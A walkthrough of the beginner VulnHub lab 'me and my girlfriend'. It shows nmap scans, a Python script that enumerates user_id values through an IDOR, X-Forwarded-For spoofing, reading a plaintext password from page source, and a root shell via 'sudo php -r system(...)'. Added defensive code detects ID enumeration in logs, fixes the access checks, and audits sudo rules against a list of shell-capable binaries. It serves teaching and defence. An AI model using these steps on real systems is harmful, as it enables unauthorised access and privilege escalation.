me and my girlfriend WP & retrospective

毁抨句 2025-10-1 17:51:53
A retrospective of a very simple target machine.
Description from the VulnHub page:
    Description: This VM tells us that there are a couple of lovers
    namely Alice and Bob,
    where the couple was originally very romantic,
    but since Alice worked at a private company,
    "Ceban Corp",
    something has changed from Alice's attitude towards Bob like
    something is "hidden", And Bob asks for your help to get what Alice
    is hiding and get full access to the company!
    Difficulty Level: Beginner
    Notes: there are 2 flag files
    Learning: Web Application | Simple Privilege Escalation
Keep the names alice and bob in mind if they come up later.
nmap
    ┌──(kali㉿kali)-[~/replay/girl]
    └─$ nmap -sT -p- 192.168.206.155 -oA nmapscan/ports
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 23:22 EDT
    Nmap scan report for 192.168.206.155
    Host is up (0.0056s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 08:00:27:A1:BD:0E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
    Nmap done: 1 IP address (1 host up) scanned in 14.62 seconds
    ┌──(kali㉿kali)-[~/replay/girl]
    └─$ nmap -sT -sC -sV -O -p22,80 192.168.206.155 -oA nmapscan/details
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 23:23 EDT
    Nmap scan report for 192.168.206.155
    Host is up (0.0017s latency).
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
    |   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
    |   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
    |_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
    80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
    |_http-title: Site doesn't have a title (text/html).
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    MAC Address: 08:00:27:A1:BD:0E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.14
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
    ┌──(kali㉿kali)-[~/replay/girl]
    └─$ nmap --script=vuln -p22,80 192.168.206.155 -oA nmapscan/vuln
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 23:23 EDT
    Nmap scan report for 192.168.206.155
    Host is up (0.00089s latency).
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    | http-slowloris-check:
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |
    |     Disclosure date: 2009-09-17
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_      http://ha.ckers.org/slowloris/
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    | http-enum:
    |   /robots.txt: Robots file
    |   /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
    |_  /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
    MAC Address: 08:00:27:A1:BD:0E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
    Nmap done: 1 IP address (1 host up) scanned in 321.63 seconds
While the script scan was running, I browsed to port 80.
1.png

You get a page like this.
There is a login page. I tried a few SQL authentication-bypass strings by hand and found no SQL injection.
A quick sqlmap scan found no SQL injection either.
So I registered a user and logged in; if I ran out of ideas later I would try brute force.
2.png

After registering, log in.
3.png

The login succeeds. Look at the URL:
http://192.168.206.155/index.php?page=dashboard&user_id=12
That user_id parameter is interesting.
Write a script that tries different user_id values and fetches each page:
    ┌──(kali㉿kali)-[~/replay/girl]
    └─$ cat curl.py
    import requests
    base_url = "http://192.168.206.155/index.php?page=dashboard&user_id="
    for user_id in range(-1, 16):  # from -1 to 15
        url = f"{base_url}{user_id}"
        try:
            response = requests.get(url, timeout=5)
            print(f"[+] user_id={user_id}, 状态码={response.status_code}")
            print(response.text[:500])  # print the first 500 characters
            print("-" * 50)
        except requests.RequestException as e:
            print(f"[!] 请求 user_id={user_id} 出错: {e}")
Run it:
    ┌──(kali㉿kali)-[~/replay/girl]
    └─$ python3 curl.py
    [+] user_id=-1, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=0, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=1, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=2, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=3, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=4, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=5, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=6, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=7, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=8, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=9, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=10, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=11, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=12, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=13, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=14, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
    [+] user_id=15, 状态码=200
    Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
    --------------------------------------------------
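Seen from the server side, the loop above leaves a characteristic trace: one client walking through many distinct user_id values within a few seconds. The following is an added example, not part of the original writeup, of detection logic over Apache combined-format access log lines. The lines in SAMPLE_LOG are constructed (the second client models a normal user opening their own dashboard), and the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache "combined" log lines modelling the enumeration loop (not taken from the target).
SAMPLE_LOG = """\
192.168.206.1 - - [16/Sep/2025:23:40:01 -0400] "GET /index.php?page=dashboard&user_id=-1 HTTP/1.1" 200 512 "-" "python-requests/2.32.3"
192.168.206.1 - - [16/Sep/2025:23:40:01 -0400] "GET /index.php?page=dashboard&user_id=0 HTTP/1.1" 200 512 "-" "python-requests/2.32.3"
192.168.206.1 - - [16/Sep/2025:23:40:02 -0400] "GET /index.php?page=dashboard&user_id=1 HTTP/1.1" 200 512 "-" "python-requests/2.32.3"
192.168.206.1 - - [16/Sep/2025:23:40:02 -0400] "GET /index.php?page=dashboard&user_id=2 HTTP/1.1" 200 512 "-" "python-requests/2.32.3"
192.168.206.1 - - [16/Sep/2025:23:40:03 -0400] "GET /index.php?page=dashboard&user_id=3 HTTP/1.1" 200 512 "-" "python-requests/2.32.3"
192.168.206.1 - - [16/Sep/2025:23:40:03 -0400] "GET /index.php?page=dashboard&user_id=4 HTTP/1.1" 200 512 "-" "python-requests/2.32.3"
192.168.206.1 - - [16/Sep/2025:23:40:04 -0400] "GET /index.php?page=dashboard&user_id=5 HTTP/1.1" 200 512 "-" "python-requests/2.32.3"
192.168.206.50 - - [16/Sep/2025:23:41:10 -0400] "GET /index.php?page=dashboard&user_id=12 HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
192.168.206.50 - - [16/Sep/2025:23:52:30 -0400] "GET /index.php?page=profile&user_id=12 HTTP/1.1" 200 1320 "-" "Mozilla/5.0"
"""

# client ip, timestamp, request line (method + path), status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
ID_RE = re.compile(r"[?&]user_id=(-?\d+)")


def parse_line(line):
    """Return (client_ip, timestamp, user_id) for a request carrying user_id, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    idm = ID_RE.search(m.group("path"))
    if not idm:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, int(idm.group(1))


def find_id_enumeration(log_text, threshold=5, window=timedelta(minutes=1)):
    """Map client IP -> sorted distinct user_id values for clients that requested at least
    `threshold` distinct ids inside some span no longer than `window` (IDOR probing)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            ip, ts, uid = parsed
            events[ip].append((ts, uid))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        best, start = set(), 0
        for end in range(len(evs)):
            # slide the window start forward until the span fits inside `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            ids = {uid for _, uid in evs[start:end + 1]}
            if len(ids) > len(best):
                best = ids
        if len(best) >= threshold:
            hits[ip] = sorted(best)
    return hits


if __name__ == "__main__":
    for ip, ids in find_id_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {len(ids)} distinct user_id values within one minute -> {ids}")
```

A legitimate user touches one or two ids; a sequential sweep from a scripted user agent is what the sliding window singles out. The same query works as a starting point for a SIEM rule keyed on client IP and the distinct-count of the id parameter.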
The response gives us a hint: try forging the X-Forwarded-For request header.
Since the range of values is small, I did not bother writing a script for this part.
At http://192.168.206.155/index.php?page=profile&user_id=5 there is a user alice; given the earlier hint, alice is the important user.
4.png

Looking at the page source, the password is right there in plaintext.
5.png
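Two defects make this foothold possible: the "local only" check is decided by a client-supplied X-Forwarded-For header, and the dashboard and profile pages select a record by the user_id in the URL instead of by the logged-in session (an IDOR), which is how alice's profile, with her password echoed into the source, became readable. The Python below is an added example, not the challenge's PHP, contrasting the weak check with one based on the TCP peer address, and adding an object-level authorization check plus a render step that never emits the stored password. USERS, the trusted-proxy list and the field names are constructed assumptions.

```python
import ipaddress

# Constructed user table standing in for the application's database (not data from the VM).
USERS = {
    5: {"name": "alice", "password": "hypothetical-secret"},
    12: {"name": "tester", "password": "hypothetical-test-pass"},
}


def is_local_request_insecure(remote_addr, headers):
    """The pattern the challenge hints at: 'local only' is decided by X-Forwarded-For,
    a header any client can set, so the check grants nothing a client cannot simply claim."""
    claimed = headers.get("X-Forwarded-For", remote_addr)
    return ipaddress.ip_address(claimed.split(",")[0].strip()).is_loopback


def is_local_request(remote_addr, headers, trusted_proxies=()):
    """Decide from the TCP peer address. X-Forwarded-For is consulted only when the peer is a
    trusted reverse proxy, and then only its rightmost entry, the one that proxy appended;
    anything further left was supplied by the client."""
    peer = ipaddress.ip_address(remote_addr)
    if str(peer) in trusted_proxies and "X-Forwarded-For" in headers:
        peer = ipaddress.ip_address(headers["X-Forwarded-For"].split(",")[-1].strip())
    return peer.is_loopback


def public_fields(record):
    """Never echo the stored password into the page source; a change-password form only
    accepts a new value and does not prefill the old one."""
    return {k: v for k, v in record.items() if k != "password"}


def dashboard(session_user_id, requested_user_id):
    """Object-level authorization: a user may only read their own record, whatever user_id
    the URL carries. Returns (HTTP status, record-or-None)."""
    if session_user_id is None:
        return 401, None
    if requested_user_id != session_user_id:
        return 403, None  # the IDOR fix: the URL parameter never overrides the session
    record = USERS.get(session_user_id)
    if record is None:
        return 404, None
    return 200, public_fields(record)


if __name__ == "__main__":
    spoofed = {"X-Forwarded-For": "127.0.0.1"}
    print("insecure check, spoofed header:", is_local_request_insecure("192.168.206.1", spoofed))
    print("peer-based check, spoofed header:", is_local_request("192.168.206.1", spoofed))
    print("session 12 asking for user 5:", dashboard(12, 5))
    print("session 12 asking for itself:", dashboard(12, 12))
```

If the application really must distinguish local callers, bind that endpoint to the loopback interface or use a separate authenticated role; an HTTP header is never an identity. For the profile page, dropping the user_id parameter altogether and reading the id from the session removes the IDOR class entirely.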

Try SSH as alice; if that fails, try the other users.
    ┌──(kali㉿kali)-[~/replay/girl]
    └─$ ssh alice@192.168.206.155
    The authenticity of host '192.168.206.155 (192.168.206.155)' can't be established.
    ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
    This host key is known by the following other names/addresses:
        ~/.ssh/known_hosts:17: [hashed name]
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.206.155' (ED25519) to the list of known hosts.
    alice@192.168.206.155's password:
    Last login: Fri Dec 13 14:48:25 2019
    alice@gfriEND:~$
It connects straight away.
Privilege escalation
    alice@gfriEND:~/.my_secret$ cat flag1.txt
    Greattttt my brother!
    You saw the Alice's note!
    Now you save the record information to give to bob!
    I know if it's given to him then Bob will be hurt but this is
    better than Bob cheated!
    Now your last job is get access to the root and read the flag ^_^
    Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
    alice@gfriEND:~/.my_secret$ cat my_notes.txt
    Woahhh! I like this company,
    I hope that here i get a better partner than bob ^_^,
    hopefully Bob doesn't know my notes
It reveals some rather private information and asks me to hand the evidence to Bob.
    alice@gfriEND:~/.my_secret$ cat my_notes.txt
    Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
    alice@gfriEND:~/.my_secret$ sudo -l
    Matching Defaults entries for alice on gfriEND:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User alice may run the following commands on gfriEND:
        (root) NOPASSWD: /usr/bin/php
    alice@gfriEND:~/.my_secret$
GTFOBins lists the sudo privilege escalation for php.
    alice@gfriEND:~/.my_secret$ CMD="/bin/sh"
    alice@gfriEND:~/.my_secret$ sudo php -r "system('$CMD');"
    ls
    flag1.txt
    my_notes.txt
    whoami
    root
    id
    uid=0(root) gid=0(root) groups=0(root)
    cd /root
    ls
    flag2.txt
    cat flag2.txt
      ________        __    ___________.__             ___________.__                ._.
    /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
    /   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
    \    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
    \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
            \/                              \/     \/       \/              \//_____/ \/
    Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
    Contact me if you want to contribute / give me feedback / share your writeup!
    Twitter: @makegreatagain_
    Instagram: @aldodimas73
    Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
Privilege escalation succeeded.
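The escalation works because sudoers hands alice an unrestricted interpreter as root with NOPASSWD; GTFOBins catalogues php alongside many other binaries that can run arbitrary code once launched by sudo. The following is an added example, not from the writeup or the VM, that parses `sudo -l` output (the one shown above, plus a constructed hardened rule) and flags rules granting a shell-capable binary without argument restriction. SHELL_CAPABLE is a short hand-picked subset, and /opt/app/maintenance.php is a hypothetical path.

```python
import os
import re

# Short hand-picked subset of binaries GTFOBins lists as able to run arbitrary code or
# spawn a shell under sudo; the real list is much longer.
SHELL_CAPABLE = {"php", "python", "python3", "perl", "ruby", "bash", "sh", "vim", "vi",
                 "less", "more", "find", "awk", "env", "nmap"}

# The sudo -l output shown in the writeup, reused as parser input.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php
"""

# Constructed hardened alternative; /opt/app/maintenance.php is a hypothetical script that
# must be root-owned and not writable by alice for the argument restriction to mean anything.
HARDENED_OUTPUT = r"""
User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php /opt/app/maintenance.php
"""

# "(root) NOPASSWD: /usr/bin/php" -> run-as user, tag list, command string
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(output):
    """Parse the 'may run the following commands' section of `sudo -l` into rule dicts."""
    rules = []
    in_commands = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in m.group("cmd").split(","):  # one line may list several commands
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": cmd.strip()})
    return rules


def audit(rules):
    """Return (severity, command, reason) for rules that let the user reach a root shell."""
    findings = []
    for r in rules:
        if r["cmd"] == "ALL":
            findings.append(("high", "ALL", f"any command as {r['runas']}"))
            continue
        argv = r["cmd"].split()
        binary = os.path.basename(argv[0]) if argv else ""
        if binary not in SHELL_CAPABLE:
            continue
        if len(argv) == 1:
            findings.append(("high", r["cmd"],
                             f"unrestricted {binary} as {r['runas']}: equivalent to a root shell"))
        else:
            findings.append(("low", r["cmd"],
                             f"{binary} as {r['runas']} pinned to fixed arguments: "
                             "verify the script is root-owned and not writable by the user"))
    return findings


if __name__ == "__main__":
    for label, text in (("current", SUDO_L_OUTPUT), ("hardened", HARDENED_OUTPUT)):
        for severity, cmd, reason in audit(parse_sudo_l(text)):
            print(f"[{label}] {severity}: {cmd} -> {reason}")
```

Pinning the arguments narrows the rule to one script, but it only helps if that script and every file it includes are owned by root and not writable by the sudoer; otherwise the interpreter rule is still a root shell with one extra step. The NOPASSWD tag on its own is the lesser issue here: the grant of an unrestricted interpreter is what the audit rates high.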

Source: posted by a 程序园 user; contact the site admin for removal in case of infringement.